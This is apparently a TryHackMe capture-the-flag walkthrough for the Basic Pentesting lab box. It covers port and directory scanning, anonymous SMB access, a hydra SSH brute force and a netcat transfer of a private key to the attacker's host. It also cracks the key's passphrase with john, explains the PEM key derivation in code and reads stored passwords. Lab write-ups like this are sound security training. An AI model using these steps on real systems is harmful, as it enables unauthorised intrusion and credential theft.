---
title: THM - Basic Pentesting (BasicPentestingJT)
chapter: 1
tags: [tryhackme]
difficulty: easy
---

# THM - Basic Pentesting (BasicPentestingJT)

Basic Pentesting: a machine that lets you practise web-application hacking and privilege escalation.

![](https://i.imgur.com/moMbBki.png)

In this set of tasks you will learn the following:

* Brute forcing
* Hash cracking
* Service enumeration
* Linux enumeration

The main goal here is to learn as much as possible. Make sure you are connected to the network using your OpenVPN configuration file.

Credit to Josiah Pierce from Vulnhub.

<https://tryhackme.com/room/basicpentestingjt>

<iframe width="560" height="315" src="https://www.youtube.com/embed/SYniWFXyrhg" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>

## Information gathering

### Port enumeration

Full TCP sweep (`-p-`) with a SYN scan, default scripts and version detection (`-sSCV`), no DNS resolution or host discovery (`-n -Pn`), keeping grepable output in `allPorts`:

~~~shell
sudo nmap -p- -sSCV --open --min-rate 5000 -vvv -n -Pn $IP -oG allPorts
~~~

~~~shell
Starting Nmap 7.80 ( https://nmap.org ) at 2023-07-06 22:24 -05
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:24
Completed NSE at 22:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:24
Completed NSE at 22:24, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:24
Completed NSE at 22:24, 0.00s elapsed
Initiating SYN Stealth Scan at 22:24
Scanning 10.10.157.219 [65535 ports]
Discovered open port 445/tcp on 10.10.157.219
Discovered open port 139/tcp on 10.10.157.219
Discovered open port 22/tcp on 10.10.157.219
Discovered open port 80/tcp on 10.10.157.219
Discovered open port 8080/tcp on 10.10.157.219
Discovered open port 8009/tcp on 10.10.157.219
Completed SYN Stealth Scan at 22:24, 18.95s elapsed (65535 total ports)
Initiating Service scan at 22:24
Scanning 6 services on 10.10.157.219
Completed Service scan at 22:25, 47.44s elapsed (6 services on 1 host)
NSE: Script scanning 10.10.157.219.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:25
Completed NSE at 22:25, 6.52s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:25
Completed NSE at 22:25, 0.95s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:25
Completed NSE at 22:25, 0.00s elapsed
Nmap scan report for 10.10.157.219
Host is up, received user-set (0.18s latency).
Scanned at 2023-07-06 22:24:20 -05 for 74s
Not shown: 65126 closed ports, 403 filtered ports
Reason: 65126 resets and 403 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZXasCfWSXQ9lYiKbTNkPs0T+wFym2lZy229LllhY6iDLrjm7LIkhCcrlgnJQtLxl5NPhlHNVmwhlkcPPiAHwluhMVE5xKihQj3i+Ucx2IwiFvfmCz4AKsWlR6N8IZe55Ltw0lcH9ykuKZddg81X85EVsNbMacJNjjyxAtwQmJt1F5kB1B2ixgjLLOyNWafC5g1h6XbEgB2wiSRJ5UA8rOZaF28YcDVo0MQhsKpQG/5oPmQUsIeJTUA/XkoWCjvXZqHwv8XInQLQu3VXKgv735G+CJaKzplh7FZyXju8ViDSAY8gdhqpJommYxzqu9s1M31cmFg2fT5V1z9s4DP/vd
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBP0SXJpgwPf/e9AT9ri/dlAnkob4PqzMjl2Q9lZIVIXeEFJ9sfRkC+tgSjk9PwK0DUO3JU27pmtAkDL4Mtv9eZw=
|   256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAzy8ZacWXbPGeqtuiJCnPP0LYZYZlMj5D1ZY9ldg1wU
80/tcp   open  http        syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       syn-ack ttl 63 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http-proxy  syn-ack ttl 63
| fingerprint-strings:
|   Socks4, Socks5:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 2243
|     Date: Fri, 07 Jul 2023 03:25:10 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|_    Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
|_http-favicon: Apache Tomcat
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache Tomcat/9.0.7
...
~~~

Services found:

* 22 sshd (OpenSSH 7.2p2)
* 80 Apache httpd 2.4.18
* 139 / 445 smbd (Samba 4.3.11-Ubuntu) <https://4sysops.com/archives/smb-port-number-ports-445-139-138-and-137-explained/>
* 8009 AJP / JServ <https://book.hacktricks.xyz/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp>
* 8080 Tomcat 9.0.7

One caveat on the scan: 403 ports came back "filtered", and nmap itself warns that at this send rate closed ports can be misreported as filtered. Nothing is obviously missing here, but when a result looks thin, rescan those ports with a lower `--min-rate`.

### Directory enumeration

~~~shell
git clone https://github.com/danielmiessler/SecLists.git /usr/share/SecList
~~~

~~~shell
wfuzz -w /usr/share/SecList/Discovery/Web-Content/common.txt -u $IP/FUZZ --hc=404 -t 35
~~~

~~~shell
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.157.219/FUZZ
Total requests: 4715

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000023:   403        11 L     32 W     292 Ch      ".hta"
000000024:   403        11 L     32 W     297 Ch      ".htaccess"
000000025:   403        11 L     32 W     297 Ch      ".htpasswd"
000001451:   301        9 L      28 W     320 Ch      "development"
000002194:   200        10 L     24 W     158 Ch      "index.html"
000003712:   403        11 L     32 W     301 Ch      "server-status"

Total time: 32.55689
Processed Requests: 4715
Filtered Requests: 4709
Requests/sec.: 144.8234
~~~

**Flag \#3:** *What is the name of the hidden directory on the web server (enter name without /)?*: `development`

Now we browse `development`; the listing (screenshot) shows two text files, `dev.txt` and `j.txt`:

![](https://hackmd.io/_uploads/ry4RC-rKn.png)

~~~shell
$ curl http://$IP/development/dev.txt
~~~

~~~plaintext
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later.
-J
~~~

~~~shell
$ curl http://$IP/development/j.txt
~~~

~~~plaintext
For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.

-K
~~~

What the notes give us: two people signing as K and J (not yet real usernames), J's password is known to be weak, and SMB has been set up. The Struts 2.5.12 remark is a second lead that this write-up does not follow; the SMB share is the cheaper one to check first.

## Vulnerability assessment

### Port 445

Null-session share listing (`-N` sends no password):

~~~shell
$ smbclient -L $IP -N

	Sharename       Type      Comment
	---------       ----      -------
	Anonymous       Disk
	IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available
~~~

~~~shell
$ smbclient //$IP/Anonymous -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Apr 19 12:31:20 2018
  ..                                  D        0  Thu Apr 19 12:13:06 2018
  staff.txt                           N      173  Thu Apr 19 12:29:55 2018

		14318640 blocks of size 1024. 11094472 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0,2 KiloBytes/sec) (average 0,2 KiloBytes/sec)
smb: \> exit
~~~

~~~shell
$ cat staff.txt
~~~

~~~plaintext
Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but this is how mistakes happen. (This means you too, Jan!)

-Kay
~~~

**Flag \#9** *What is the name of the other user you found (all lower case)?*: `kay`

**Flag \#5** *What is the username?*: `jan`

Both answers are lower case: the question asks for it, and it matches the accounts as they exist on the box (the hydra run and the SSH login below use `jan`). The note below explains why the case matters.

## Usernames are case-sensitive

> Just like hostnames and domain names, the username is not strictly a Unix thing but can and often does span a wider range of OS types.
>
> Whether they will be considered case sensitive depends then on the standard used to specify them.
>
> Hostnames and domain names are clearly case insensitive by the DNS standard (see RFC4343).
>
> Usernames stored on a local backend (/etc/passwd) or a Unix style one (NIS) are not case insensitive by the POSIX standard.
>
> Usernames stored in an LDAP or an Active Directory backend will follow the used attribute schema definition, uid and cn which are often storing the user name have a differing schema attributes, case insensitive for the former but case sensitive for the latter. That means both Abc and abc might match or not abc's entry depending on the ldap server configuration.
>
> Due to this inconsistency, I would recommend to only use lowercase for both usernames and host/domain name and then avoid ssh ABC@SERVERNAME.DOMAIN.COM which is rude anyway.

<https://unix.stackexchange.com/a/235086/445265>

## Part 2

Fetch rockyou. Note the capital `-O` to pick the output file; lowercase `-o` only redirects wget's log and leaves the download in the current directory:

~~~shell
mkdir -p /usr/share/wordlist
wget https://github.com/praetorian-inc/Hob0Rules/raw/master/wordlists/rockyou.txt.gz -O /usr/share/wordlist/rockyou.txt.gz
gzip -d /usr/share/wordlist/rockyou.txt.gz
~~~

Limit the dictionary to 7-character entries, because the answer box for the flag shows that the password is 7 characters long:

![](https://hackmd.io/_uploads/BkuFISIth.png)

~~~shell
LC_ALL=C grep -aoE '^.{7}$' /usr/share/wordlist/rockyou.txt > /usr/share/wordlist/rockyou-7.txt
~~~

`LC_ALL=C` and `-a` matter here: rockyou contains lines that are not valid UTF-8, and in a UTF-8 locale `.` does not match those bytes, so such lines are silently dropped (and grep may stop and report "binary file matches"). In the C locale `.{7}` means exactly seven bytes.

Hydra's warning below is worth heeding in general: sshd limits unauthenticated connections (`MaxStartups`), so with 16 parallel tasks some attempts can be refused and counted as failed guesses; `-t 4` is slower but reliable. Here the password turned up within two minutes anyway.

~~~shell
$ hydra ssh://$IP -l jan -P /usr/share/wordlist/rockyou-7.txt
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-07 21:13:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2507225 login tries (l:1/p:2507225), ~156702 tries per task
[DATA] attacking ssh://10.10.219.185:22/
[STATUS] 178.00 tries/min, 178 tries in 00:01h, 2507052 to do in 234:45h, 16 active
[22][ssh] host: 10.10.219.185   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-07 21:15:16
~~~

(There was only one target; the `[ERROR]` lines refer to the five worker threads hydra aborted once the password was found.)

**Flag \#6:** *What is the password?*: `armando`

### SSH connection

Log in as `jan` with the password `armando`:

~~~shell
ssh jan@$IP
jan@basic2:~$
~~~

~~~shell
jan@basic2:~$ ls /home -al
total 16
drwxr-xr-x  4 root root 4096 Apr 19  2018 .
drwxr-xr-x 24 root root 4096 Apr 23  2018 ..
drwxr-xr-x  2 root root 4096 Apr 23  2018 jan
drwxr-xr-x  5 kay  kay  4096 Apr 23  2018 kay
~~~

Two things to note: `/home/jan` is owned by root (so jan cannot even create `~/.ssh`, which shows up later), and `/home/kay` is world-readable.

~~~shell
jan@basic2:~$ cd /home/kay
jan@basic2:/home/kay$ ls -al
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak
~~~

`pass.bak` and `.bash_history` are mode 600, so they are out of reach for now, but `.ssh` is world-readable:

~~~shell
jan@basic2:/home/kay$ cd .ssh
jan@basic2:/home/kay/.ssh$ ls -al
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23  2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23  2018 ..
-rw-rw-r-- 1 kay kay  771 Apr 23  2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19  2018 id_rsa
-rw-r--r-- 1 kay kay  771 Apr 19  2018 id_rsa.pub
~~~

`id_rsa` is mode 644, readable by any local user; that is the misconfiguration here. The private key is encrypted with a passphrase, so the passphrase is the only thing still protecting kay's account, and we need to crack it.
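Before throwing a wordlist at the key it is worth knowing how it is protected, because that decides whether cracking is realistic. The script below is an added example (not part of this write-up, and not code from john or ssh2john): it reads the PEM header to report format, cipher and KDF, and reproduces the legacy PEM key derivation that john attacks when it reports `KDF/cipher ... 0` for a key (OpenSSL's `EVP_BytesToKey`: MD5 over passphrase and salt, the salt being the first 8 bytes of the IV from the `DEK-Info` header). The two PEM blocks inside it are constructed for the demo: the legacy one has filler instead of a real key body, the `openssh-key-v1` one contains only the header fields. The passphrase `beeswax` is the one recovered further down and is used here only as KDF input.

```python
import base64
import hashlib
import re
import struct

# Key length in bytes for the OpenSSL cipher names that appear in DEK-Info headers.
KEY_LEN = {"AES-128-CBC": 16, "AES-192-CBC": 24, "AES-256-CBC": 32, "DES-EDE3-CBC": 24}

# Constructed sample in the legacy PEM layout (the layout of kay's id_rsa, for which
# john reported "KDF/cipher ... 0" = MD5/AES). The base64 body is filler, not a key.
SAMPLE_LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0A1B2C3D4E5F60718293A4B5C6D7E8F9

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
-----END RSA PRIVATE KEY-----
"""


def _ssh_string(b: bytes) -> bytes:
    """uint32 length prefix + bytes: the string encoding used by openssh-key-v1."""
    return struct.pack(">I", len(b)) + b


# Constructed openssh-key-v1 sample: only the header fields (cipher, KDF, KDF options,
# key count) are present, which is all the inspector below reads.
SAMPLE_OPENSSH_V1 = (
    "-----BEGIN OPENSSH PRIVATE KEY-----\n"
    + base64.b64encode(
        b"openssh-key-v1\0"
        + _ssh_string(b"aes256-ctr")
        + _ssh_string(b"bcrypt")
        + _ssh_string(_ssh_string(b"\x11" * 16) + struct.pack(">I", 16))  # salt, rounds
        + struct.pack(">I", 1)  # number of keys
    ).decode()
    + "\n-----END OPENSSH PRIVATE KEY-----\n"
)


def pem_kdf_info(pem: str) -> dict:
    """Report format, cipher and KDF of a PEM-armored private key.

    Legacy "BEGIN RSA PRIVATE KEY" files keep cipher and IV in a DEK-Info header and
    derive the key with MD5 (EVP_BytesToKey); openssh-key-v1 files carry cipher, KDF
    name and the bcrypt round count inside the base64 blob.
    """
    lines = pem.strip().splitlines()
    m = re.fullmatch(r"-----BEGIN ([A-Z ]+)-----", lines[0])
    if not m:
        raise ValueError("not a PEM block")
    body = lines[1:-1]
    if m.group(1) == "OPENSSH PRIVATE KEY":
        blob = base64.b64decode("".join(body))
        magic = b"openssh-key-v1\0"
        if not blob.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        off, fields = len(magic), []
        for _ in range(3):  # ciphername, kdfname, kdfoptions
            (n,) = struct.unpack(">I", blob[off:off + 4])
            fields.append(blob[off + 4:off + 4 + n])
            off += 4 + n
        cipher, kdf, kdfopts = fields
        rounds = None
        if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
            (salt_len,) = struct.unpack(">I", kdfopts[:4])
            (rounds,) = struct.unpack(">I", kdfopts[4 + salt_len:8 + salt_len])
        return {"format": "openssh-key-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
    # Legacy PEM: "Header: value" lines precede the base64 body, which contains no ':'.
    headers = {k.strip(): v.strip() for k, v in
               (line.split(":", 1) for line in body if ":" in line)}
    if headers.get("Proc-Type") != "4,ENCRYPTED":
        return {"format": "pem", "encrypted": False}
    cipher, iv_hex = headers["DEK-Info"].split(",")
    return {"format": "pem", "encrypted": True, "cipher": cipher,
            "kdf": "EVP_BytesToKey(MD5, count=1)", "iv": bytes.fromhex(iv_hex)}


def evp_bytes_to_key(passphrase: bytes, iv: bytes, key_len: int) -> bytes:
    """OpenSSL's legacy PEM KDF: salt = first 8 bytes of the IV, one MD5 per 16-byte
    output block chained on the previous digest, no iteration count. One or two MD5
    calls per guess is why john reaches six-figure candidates/s on such keys."""
    salt, out, prev = iv[:8], b"", b""
    while len(out) < key_len:
        prev = hashlib.md5(prev + passphrase + salt).digest()
        out += prev
    return out[:key_len]


def legacy_key_material(pem: str, passphrase: bytes) -> tuple:
    """(key, iv) for a legacy encrypted PEM. A cracker AES-CBC-decrypts the body with
    these and accepts the guess if the plaintext is valid PKCS#7-padded DER."""
    info = pem_kdf_info(pem)
    if info["format"] != "pem" or not info["encrypted"]:
        raise ValueError("not a legacy encrypted PEM")
    return evp_bytes_to_key(passphrase, info["iv"], KEY_LEN[info["cipher"]]), info["iv"]


if __name__ == "__main__":
    print("legacy:", pem_kdf_info(SAMPLE_LEGACY_PEM))
    print("openssh-v1:", pem_kdf_info(SAMPLE_OPENSSH_V1))
    key, iv = legacy_key_material(SAMPLE_LEGACY_PEM, b"beeswax")
    print("AES-128-CBC key derived from 'beeswax':", key.hex())
```

Point it at the real file with `pem_kdf_info(open("id_rsa").read())`: a `Proc-Type: 4,ENCRYPTED` header means the legacy format and one MD5 per candidate, which is the rate john shows further down; an `openssh-key-v1` key with `bcrypt` at the default 16 rounds costs far more per guess and changes the cracking estimate accordingly. Actually testing a guess means decrypting the body with the derived key and IV and checking for valid DER, which is what john's SSH format does for you.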
Send the private key to the attacker machine. This is a plain netcat transfer with no integrity check, so compare `sha256sum id_rsa` on both ends before cracking:

~~~shell
uqnar@un:~$ nc -nlvp 5000 > id_rsa
~~~

~~~shell
jan@basic2:/home/kay$ nc 10.18.41.138 5000 < .ssh/id_rsa
~~~

Get the hash for John the Ripper (`ssh2john` ships with john; on some distributions it is installed as `/usr/share/john/ssh2john.py`):

~~~shell
uqnar@un:~/tmp$ ssh2john id_rsa > hash
~~~

~~~shell
$ sudo john -w:/usr/share/wordlists/rockyou.txt ./hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (id_rsa)
1g 0:00:00:00 DONE (2023-07-07 22:52) 1.388g/s 114911p/s 114911c/s 114911C/s behlat..bball40
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
~~~

The `Cost 1 ... is 0` line says the key is in the legacy PEM format (MD5-based key derivation, AES), which is why john tests over 100k candidates per second; a modern `openssh-key-v1` key with bcrypt would be orders of magnitude slower to attack.

Running john again only reports that the hash is already cracked; `--show` prints the result from the pot file:

~~~shell
$ sudo john -w:/usr/share/wordlists/rockyou.txt ./hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
No password hashes left to crack (see FAQ)
~~~

~~~shell
sudo john --show ./hash
id_rsa:beeswax

1 password hash cracked, 0 left
~~~

Since we already have a shell as jan, the key can be used directly on the box. The "Could not create directory" and "Failed to add the host" messages are because `/home/jan` is root-owned (see the listing above) and are harmless:

~~~shell
jan@basic2:/home/kay/.ssh$ ssh -i id_rsa kay@localhost
Could not create directory '/home/jan/.ssh'.
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.
Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$
~~~

`pass.bak` is mode 600 and owned by kay, which is why it had to wait for this shell:

~~~shell
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
~~~

Final password (kay's): `heresareallystrongpasswordthatfollowsthepasswordpolicy$$`